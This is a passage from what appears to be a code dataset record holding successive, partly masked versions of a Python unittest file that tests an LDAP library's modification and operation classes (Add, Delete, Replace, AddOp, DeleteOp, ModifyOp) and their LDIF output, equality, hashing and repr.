94086\\n-\\ndelete: description\\n-\\nreplace: telephonenumber\\ntelephonenumber: +1 408 555 1234\\ntelephonenumber: +1 408 555 5678\\n-\\ndelete: facsimiletelephonenumber\\nfacsimiletelephonenumber: +1 408 555 9876\\n-\\n\\n'\n , result)\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual('cn=john,dc=example,dc=com', sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(first, second)\n self.assertEqual(first.asLDIF(), second.asLDIF(),\n 'LDIF equality is a precondition for valid hash values')\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',\n ['bar'])])\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])\"\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n\n def testEquality_Add_True(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Add('k', ['b', 'c', 'd'])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Delete('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = ['b', 'c', 'd']\n self.assertNotEqual(a, b)\n",
"step-3": "<mask token>\n\n\nclass TestModifications(unittest.TestCase):\n\n def setUp(self):\n self.foo = ldapsyntax.LDAPEntry(None, dn='cn=foo,dc=example,dc=com',\n attributes={'objectClass': ['person'], 'cn': ['foo', 'thud'],\n 'sn': ['bar'], 'more': ['junk']})\n <mask token>\n\n def testAddNew(self):\n mod = delta.Add('stuff', ['val1', 'val2'])\n mod.patch(self.foo)\n self.assertEqual(self.foo['stuff'], ['val1', 'val2'])\n self.assertEqual(self.foo['cn'], ['foo', 'thud'])\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def testReplace_Delete_NonExisting(self):\n mod = delta.Replace('nonExisting', [])\n mod.patch(self.foo)\n self.assertFalse('stuff' in self.foo)\n self.assertEqual(self.foo['sn'], ['bar'])\n self.assertEqual(self.foo['more'], ['junk'])\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n\n def testAdd(self):\n m = delta.Add('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'add: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testDelete(self):\n m = delta.Delete('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'delete: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testDeleteAll(self):\n m = delta.Delete('foo')\n self.assertEqual(m.asLDIF(), b'delete: foo\\n-\\n')\n\n def testReplace(self):\n m = delta.Replace('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'replace: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testReplaceAll(self):\n m = delta.Replace('thud')\n self.assertEqual(m.asLDIF(), b'replace: thud\\n-\\n')\n\n def testAddBase64(self):\n \"\"\"\n LDIF attribute representation is base64 encoded\n if attribute value contains nonprintable characters\n or starts with reserved characters\n \"\"\"\n m = delta.Add('attr', [':value1', 'value\\n\\r2'])\n self.assertEqual(m.asLDIF(),\n b'add: attr\\nattr:: OnZhbHVlMQ==\\nattr:: dmFsdWUKDTI=\\n-\\n')\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.\n DistinguishedName('dc=example,dc=com'))\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: dc=example,dc=com\\nchangetype: add\\nfoo: bar\\nfoo: baz\\nquux: thud\\n\\n'\n , result)\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',\n 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',\n 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n sut = delta.AddOp(team_entry)\n self.assertNotEqual(sut, {'foo': ['same', 'attributes']})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'one', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'other', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [\n 'a', 'b'], 'ou': ['HR']})\n hr_entry = entry.BaseLDAPEntry(dn=\n 'ou=Existing Team, dc=example,dc=com', attributes={'foo': [\n 'dont', 'care']})\n sut = delta.AddOp(hr_entry)\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'bar': ['foo'], 'foo': ['bar']}))\n self.assertEqual(repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))\"\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n result = sut.asLDIF()\n self.assertEqual(b'dn: dc=example,dc=com\\nchangetype: delete\\n\\n',\n result)\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(stringValue=\n 'ou=Team,dc=example,dc=com')\n first = delta.DeleteOp(first_dn)\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')\n second = delta.DeleteOp(second_entry)\n third = delta.DeleteOp('ou=Team, dc=example,dc=com')\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n sut = delta.DeleteOp(team_entry)\n self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp('cn=nope,dc=example,dc=com')\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',\n [delta.Add('postaladdress', [\n '123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(\n 'description'), delta.Replace('telephonenumber', [\n '+1 408 555 1234', '+1 408 555 5678']), delta.Delete(\n 'facsimiletelephonenumber', ['+1 408 555 9876'])])\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\\nchangetype: modify\\nadd: postaladdress\\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\\n-\\ndelete: description\\n-\\nreplace: telephonenumber\\ntelephonenumber: +1 408 555 1234\\ntelephonenumber: +1 408 555 5678\\n-\\ndelete: facsimiletelephonenumber\\nfacsimiletelephonenumber: +1 408 555 9876\\n-\\n\\n'\n , result)\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual('cn=john,dc=example,dc=com', sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(first, second)\n self.assertEqual(first.asLDIF(), second.asLDIF(),\n 'LDIF equality is a precondition for valid hash values')\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',\n ['bar'])])\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])\"\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n\n def testEquality_Add_True(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Add('k', ['b', 'c', 'd'])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Delete('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = ['b', 'c', 'd']\n self.assertNotEqual(a, b)\n",
"step-4": "<mask token>\n\n\nclass TestModifications(unittest.TestCase):\n\n def setUp(self):\n self.foo = ldapsyntax.LDAPEntry(None, dn='cn=foo,dc=example,dc=com',\n attributes={'objectClass': ['person'], 'cn': ['foo', 'thud'],\n 'sn': ['bar'], 'more': ['junk']})\n <mask token>\n\n def testAddNew(self):\n mod = delta.Add('stuff', ['val1', 'val2'])\n mod.patch(self.foo)\n self.assertEqual(self.foo['stuff'], ['val1', 'val2'])\n self.assertEqual(self.foo['cn'], ['foo', 'thud'])\n <mask token>\n <mask token>\n\n def testDelete_FailOnNonExistingAttributeType_All(self):\n mod = delta.Delete('notexist', [])\n self.assertRaises(KeyError, mod.patch, self.foo)\n <mask token>\n\n def testDelete_FailOnNonExistingAttributeValue(self):\n mod = delta.Delete('cn', ['notexist'])\n self.assertRaises(LookupError, mod.patch, self.foo)\n <mask token>\n <mask token>\n <mask token>\n\n def testReplace_Delete_NonExisting(self):\n mod = delta.Replace('nonExisting', [])\n mod.patch(self.foo)\n self.assertFalse('stuff' in self.foo)\n self.assertEqual(self.foo['sn'], ['bar'])\n self.assertEqual(self.foo['more'], ['junk'])\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n\n def testAdd(self):\n m = delta.Add('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'add: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testDelete(self):\n m = delta.Delete('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'delete: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testDeleteAll(self):\n m = delta.Delete('foo')\n self.assertEqual(m.asLDIF(), b'delete: foo\\n-\\n')\n\n def testReplace(self):\n m = delta.Replace('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'replace: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testReplaceAll(self):\n m = delta.Replace('thud')\n self.assertEqual(m.asLDIF(), b'replace: thud\\n-\\n')\n\n def testAddBase64(self):\n \"\"\"\n LDIF attribute representation is base64 encoded\n if attribute value contains nonprintable characters\n or starts with reserved characters\n \"\"\"\n m = delta.Add('attr', [':value1', 'value\\n\\r2'])\n self.assertEqual(m.asLDIF(),\n b'add: attr\\nattr:: OnZhbHVlMQ==\\nattr:: dmFsdWUKDTI=\\n-\\n')\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.\n DistinguishedName('dc=example,dc=com'))\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: dc=example,dc=com\\nchangetype: add\\nfoo: bar\\nfoo: baz\\nquux: thud\\n\\n'\n , result)\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',\n 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',\n 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n sut = delta.AddOp(team_entry)\n self.assertNotEqual(sut, {'foo': ['same', 'attributes']})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'one', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'other', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [\n 'a', 'b'], 'ou': ['HR']})\n hr_entry = entry.BaseLDAPEntry(dn=\n 'ou=Existing Team, dc=example,dc=com', attributes={'foo': [\n 'dont', 'care']})\n sut = delta.AddOp(hr_entry)\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'bar': ['foo'], 'foo': ['bar']}))\n self.assertEqual(repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))\"\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n result = sut.asLDIF()\n self.assertEqual(b'dn: dc=example,dc=com\\nchangetype: delete\\n\\n',\n result)\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(stringValue=\n 'ou=Team,dc=example,dc=com')\n first = delta.DeleteOp(first_dn)\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')\n second = delta.DeleteOp(second_entry)\n third = delta.DeleteOp('ou=Team, dc=example,dc=com')\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n sut = delta.DeleteOp(team_entry)\n self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp('cn=nope,dc=example,dc=com')\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',\n [delta.Add('postaladdress', [\n '123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(\n 'description'), delta.Replace('telephonenumber', [\n '+1 408 555 1234', '+1 408 555 5678']), delta.Delete(\n 'facsimiletelephonenumber', ['+1 408 555 9876'])])\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\\nchangetype: modify\\nadd: postaladdress\\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\\n-\\ndelete: description\\n-\\nreplace: telephonenumber\\ntelephonenumber: +1 408 555 1234\\ntelephonenumber: +1 408 555 5678\\n-\\ndelete: facsimiletelephonenumber\\nfacsimiletelephonenumber: +1 408 555 9876\\n-\\n\\n'\n , result)\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual('cn=john,dc=example,dc=com', sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first, 